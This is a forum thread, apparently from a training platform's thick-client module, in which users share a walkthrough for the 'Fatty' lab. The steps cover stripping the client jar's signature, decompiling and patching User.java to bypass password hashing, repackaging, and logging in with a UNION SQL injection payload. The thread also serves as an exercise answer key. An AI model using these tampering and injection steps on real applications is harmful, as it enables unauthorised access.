Exploiting Web Vulnerabilities in Thick-Client Applications

You don’t need to downloads server.jar at all. Just mess with client.jar Users.java file so that SQL injection works.
Despite people constantly complaining how useless Thick-Client section is, they still didn’t remove it. You learn 0 and will never use it in the real world.

I just solved it. Every time you modify the traverse file, copy the entire raw folder somewhere else for backup and then delete it. Then follow this, beginning from the Apps folder in powershell:
1.
javac -cp fatty-client-new.jar fatty-client-new.jar.src<path to the file you edited>.java

^repeat above for each file you have edited, generally you’re only changing one or two at a time, for example you don’t need the server to download fatty-server.jar to your desktop more than once.
2.
mkdir raw
3.
cp fatty-client-new.jar raw\fatty-client-new-2.jar
4.
mv -Force fatty-client-new.jar.src<filepath of file you edited>*.class
^repeat above for each javac -cp command you used above
cd raw
5.
jar -cmf META-INF\MANIFEST.MF traverse.jar .

I’ll also include that each time I edited the code, I didn’t delete any lines, kept the edited lines where they were, and added “/* */” on any new lines I had to create.

I also followed hx1’s advice and added:
import java.io.FileOutputStream;
import java.util.Properties;
to the two free lines before “public class Invoker” at the top of Invoker.java

This one took me a very long time to complete compared to others. Good luck.

1 Like

same lab

I asked forum’s staff to delete my previous post as it was no longer editable. There was an issue in very last step in SQL injection login command. Modified version of the original “short run” is below.

This section is a part of ‘insane’ HTB box “Fatty”.
I wonder why HTB decided to put it into the medium module but whatever.
If you don’t want to spend as much time as I did - here is a “fast” run (it should
take around 30-40 min), spoilers:

  • You don’t need to map ip with server.fatty.htb as it is already done in hosts file,
    so you may skip wireshark step.
  1. Extract all the files from fatty-client.jar;
  • Location of the file is C:\inetpub\ftproot\
  1. Change port from 8000 to 1337 in beans.xml (<constructor-arg index="1" value = "1337");
  • It might say that you don’t have right privileges so be sure that
    you’ve launched notepad as admin;
  1. Remove sha256 hashes from MANIFEST.MF in META-INF folder;
  • And again it might say that you don’t have the right privileges, so use admin
    notepad.
  1. Delete 1.RSA and 1.SF;

  2. Build a new client: jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *

  • I use admin powershell as well;
  • I assume that you cd into C:\inetpub\ftproot\, client appears in C:\inetpub;
  • Pay attention to *;

Now you might want to check if newly generated client works as inteded and continue:

  1. Drag newly generated fatty-client-new.jar to JD-GUI and save all source file on a Desktop;
  • JD-GUI is located in TOOLS folder on a Desktop
  1. Extract files from newly created file fatty-client-new-jar.src.zip on a Desktop (right click on the archive and extract to fatty-client-new-jar.src\);

  2. Copy fatty-client-new.jar from C:\inetpub on a Desktop;

  3. Find and modify User.java file in one of extracted folders (precisely: fatty-client-new.jar.src\htb\fatty\shared\resources\User.java).

You should find following parts of the code: public User (string 20) and public void setPassword (string 76), you have to modify these methods code as indicated below:

...............................................................................................             
-ORIGINAL CODE-
...............................................................................................
/*     */    public User(int uid, String username, String password, String email, Role role) {
/*  20 */      this.uid = uid;
/*  21 */      this.username = username;
/*  22 */      this.password = password;
/*  23 */      this.email = email;
/*  24 */      this.role = role;
/*     */    }
...............................................................................................             
-ORIGINAL CODE-
...............................................................................................
/*     */    public void setPassword(String password) {
/*  76 */      this.password = password;
/*     */    }
...............................................................................................             
-ORIGINAL CODE-
...............................................................................................

  • I am not very familiar with java programming, so I don’t know if it is required to
    keep strings numbers (*/1 etc) in precise order or not to write numbers for empty
    strings or "}". But I did it in all the cases in order not to break anything

Now you need to build a new client to make your SQL injection, change directory in powershell with cd C:\Users\cybervaca\Desktop and continue.

  1. Compile User.java with following command:
    javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
  • I assume that fatty-client-new.jar archive and fatty-client-new.jar.src folder are on a Desktop.
  1. Make a new dir (raw) with mkdir raw;

  2. Copy new client archive into the raw folder:
    cp fatty-client-new.jar raw\fatty-client-new-2.jar

  3. Open the raw folder and extract files from the fatty-client-new-2.jar (Extract Here);

  4. Overwrite User.class file in raw\htb\fatty\shared\resources\ with following command:
    mv -Force fatty-client-new.jar.src\htb\fatty\shared\resources\User.class raw\htb\fatty\shared\resources\
    (there should be only one User.class file). Or you may just drag it from one folder to another.

  5. Cd to raw and build a new client
    jar -cmf META-INF\MANIFEST.MF client_name.jar .

  • Pay attention “.” at the end is required!
  1. Launch the client, input credentials:
    Username: abc' UNION SELECT 1,'abc','a@b.com','abc','admin
    Password: abc
  • Last time format here wasn’t correct even I had copied it directly from Windows system.
    It should work now, but if you have issues and get “Login Failed” or stuck feel free to grab
    Username string from the module.
  1. Server Status should be available now and you can get Ipconfig.

P.S. Just followed all the steps and it works!

20 Likes

Nice job! This module severely lacks the explanations on the Java disassembly and recompiling. Thanks for putting this out here.

1 Like

Hello, brother I had the same problem. You need to have both the fatty-client-new.jar file and the fatty-client-new.jar.src folder in the same directory and then run the command.

I tried everything, i just cannot get this to work… can anyone help?

Hello, could you be more specific regarding your issue?

i cannot seem to download the fatty-server, but looking at the question i dont need to, but i cannot seem te edit the files in a normal way because i have to deal with the / * / in every line. I dont want to spoil it but i can login, that works but i cant seem to edit the code to give me the admin login to get the answer to the question.

If I properly understood you have some issues with file editing. If you want I can send you final version of User.java so you can replicate next steps. P.S. You can actually transfer User.java to your linux machine for editing and then back to Windows host.

i got it, it took some craftsmanship but my user.java was edited correctly and the classes worked!
Does the transfer to linux take away the /* */ at the beginning of the lines?

Thanks, i used this for the extra guidance

1 Like

Why would they do thissssssssssssssssssssssssssssssssssssssssssssssss

1 Like

for the lulz

Hi I have tried to do it exactly as you said but for some reason sqli does not work for me. I tried both yours and the academy username strings but login is failed still. Here is my User.java if anyone can see what’s wrong with it I would appreciate it

/*     */ package htb.fatty.shared.resources;
/*     */ 
/*     */ import java.io.Serializable;
/*     */ import java.nio.charset.StandardCharsets;
/*     */ import java.security.MessageDigest;
/*     */ import java.security.NoSuchAlgorithmException;
/*     */ import javax.xml.bind.DatatypeConverter;
/*     */ 
/*     */ 
/*     */ public class User
/*     */   implements Serializable
/*     */ {
/*     */   int uid;
/*     */   String username;
/*     */   String password;
/*     */   String email;
/*     */   Role role;
/*     */   
/*     */   public User(int uid, String username, String password, String email, Role role) {
/*  20 */     this.uid = uid;
/*  21 */     this.username = username;
/*  33 */     this.email = email;
/*  34 */     this.role = role;
/*     */   }
/*     */ 
/*     */   
/*     */   public User(int uid, String username, String password, String email, Role role, boolean hash) {
/*  39 */     this(uid, username, password, email, role);
/*  40 */     if (!hash) {
/*  41 */       this.password = password;
/*     */     }
/*     */   }
/*     */ 
/*     */   
/*     */   public User(String username, String password, boolean hash) {
/*  47 */     this(username, password);
/*  48 */     if (!hash) {
/*  49 */       this.password = password;
/*     */     }
/*     */   }
/*     */ 
/*     */   
/*     */   public User(String username, String password) {
/*  55 */     this(999, username, password, "", Role.getAnonymous());
/*     */   }
/*     */ 
/*     */   
/*     */   public User() {
/*  60 */     this(999, "", "", "", Role.getAnonymous());
/*     */   }
/*     */ 
/*     */   
/*     */   public static User anonymousUser() {
/*  65 */     User anonymousUser = new User(0, "anonymous", "anonymous", "anonymous@none.nonono", Role.getAnonymous());
/*  66 */     return anonymousUser;
/*     */   }
/*     */ 
/*     */   
/*     */   public void setUsername(String username) {
/*  71 */     this.username = username;
/*     */   }
/*     */ 
/*     */   
/*     */    public void setPassword(String password) {
/*  76 */      this.password = password;
/*     */    }
/*     */ 
/*     */   
/*     */   public String getUsername() {
/*  89 */     return this.username;
/*     */   }
/*     */ 
/*     */   
/*     */   public String getPassword() {
/*  94 */     return this.password;
/*     */   }
/*     */ 
/*     */   
/*     */   public String getRoleName() {
/*  99 */     return this.role.getRoleName();
/*     */   }
/*     */ 
/*     */   
/*     */   public void setRoleByName(String roleName) {
/* 104 */     this.role = Role.getRoleByName(roleName);
/*     */   }
/*     */ 
/*     */   
/*     */   public Role getRole() {
/* 109 */     return this.role;
/*     */   }
/*     */ }


/* Location:              C:\inetpub\ftproot\fatty-client-new.jar!\htb\fatty\shared\resources\User.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       1.1.3
 */
2 Likes

Hello, as far as I see you missed this.password = password; in public User which starts on line 19.

Please check my post again

Or PM me, I can share my User.java file with you.

2 Likes

Hi, thank you for prompt response. You were right, I was also running the wrong client. There were too many of them and I have lost count. Thank you!

You are welcome!

Thank you for the code, I had some problem but when I used this code everything run

1 Like

Thank you!! It was REALLY helpfull for me

1 Like